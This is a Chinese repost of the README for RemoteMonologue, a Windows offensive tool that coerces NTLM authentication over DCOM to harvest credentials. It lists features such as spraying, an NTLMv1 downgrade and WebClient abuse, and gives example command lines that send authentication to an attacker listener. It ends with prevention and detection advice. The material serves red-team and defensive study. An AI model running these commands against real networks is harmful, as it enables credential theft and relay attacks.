利用 DCOM 进行 NTLM 身份验证强制

RemoteMonologue 是一种 Windows 凭证收集技术，它利用交互式用户 RunAs 密钥并通过 DCOM 强制 NTLM 身份验证来实现远程用户入侵。

阅读 X-Force Red 的RemoteMonologue：利用 DCOM 进行 NTLM 身份验证强制以获取详细信息-https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions。

特征

🔹通过 DCOM 进行身份验证强制（-dcom）

• 针对三个 DCOM 对象（ServerDataCollectorSet、FileSystemImage、UpdateSession）触发针对指定侦听器的 NTLM 身份验证（-auth-to）。

🔹证件喷涂（-spray）

• 跨多个系统验证凭证，同时捕获用户凭证。

🔹 NetNTLMv1 降级攻击（-downgrade）

• 强制目标使用 NTLMv1，使凭证破解和中继更容易。

🔹 WebClient 服务滥用 ( -webclient)

• 启用 WebClient 服务来促进基于 HTTP 的身份验证强制。

🔹用户枚举（-query）

• 识别目标系统上具有活动会话的用户。

注意：需要目标系统的本地管理员权限。

设置

pip install impacket

示例

下面是使用 NetNTLMv1 降级攻击并作为侦听器运行 RemoteMonologue 的示例Responder。默认情况下，如果未指定 DCOM 选项，则该工具使用ServerDataCollectorSetDCOM 对象。

RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

下面是另一个示例，这次攻击使用FileSystemImageDCOM 对象执行并启用 WebClient 服务来获取 HTTP 身份验证，然后使用将其中继到 LDAP ntlmrelayx。

RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

防御考虑

为了防范和检测这些技术，可以实施多种预防和检测措施。

预防措施：

启用 LDAP 签名和通道绑定：在域控制器上配置 LDAP 签名强制执行和通道绑定，以保护 LDAP 端点免受中继攻击。注意：从 Windows Server 2025 开始，这些设置将默认强制执行。

升级到最新的 Windows 版本：将服务器升级到 Windows Server 2025，将工作站升级到 Windows 11 版本 24H2，以缓解 NetNTLM 降级攻击，因为这些版本中已删除 NTLMv1。

强制执行 SMB 签名：在 Windows 服务器上启用并强制执行 SMB 签名，以防止 SMB 中继攻击。

实施强密码策略：强制执行强密码要求，使密码破解攻击更具挑战性。

检测机会：

监控对 DCOM 对象的远程访问：跟踪对受影响的 DCOM 对象及其特定属性和方法的访问，以识别异常活动。

监视注册表修改：监视 RunAs 和 LmCompatibilityLevel 注册表项的更改。

跟踪 WebClient 服务活动：监控远程启用 WebClient 服务的实例，因为这用于促进基于 HTTP 的 NTLM 身份验证。

项目地址：

https://github.com/xforcered/RemoteMonologue

原文始发于微信公众号（Ots安全）：利用 DCOM 进行 NTLM 身份验证强制